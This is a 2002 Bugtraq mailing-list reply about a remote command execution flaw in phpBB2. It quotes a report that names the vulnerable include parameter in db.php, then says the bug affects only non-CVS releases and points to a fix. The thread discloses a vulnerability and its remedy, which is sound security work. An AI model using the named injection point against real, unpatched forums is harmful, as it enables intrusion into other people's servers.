[24737] in bugtraq
Re: phpBB2 remote execution command (fwd)
daemon@ATHENA.MIT.EDU (Jose Romeo Vela)
Mon Mar 18 23:25:24 2002
Date: Mon, 18 Mar 2002 20:17:42 -0500 (EST)
From: Jose Romeo Vela <jrvela@aristasol.com>
To: <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>, <nullbyte@inetd-secure.net>
Message-ID: <Pine.LNX.4.33.0203182010520.12002-100000@la-sirena.aristasol.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
--- nullbyte <nullbyte@inetd-secure.net> wrote:
> phpBB2 is vulnerable to remote execution command
>
> All *nix running phpBB2 versoion 2.0.
>
> Bug could be found at "phpBB2 root path" which is allowed remote
> attacker
> to execute any command remotely.
> The vulnerability of this attack start with
> '/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server
> are needed to launch the attack.
>
> I did not look further into this bug.
> It is tested on most *nix systems running phpBB2 version 2.0.
> Probably all
> versions.
>
> Bug was found by pokley and nullbyte
>
> nullbyte
> nullbyte@inetd-secure.net
>
This bug only affects non-CVS versions. There is a fix available. For
details see:
http://phpbb.sourceforge.net/phpBB2/viewtopic.php?t=9105
---------------------------------------------------------------------
Jose Romeo Vela
jrvela@aristasol.com
http://www.aristasol.com/
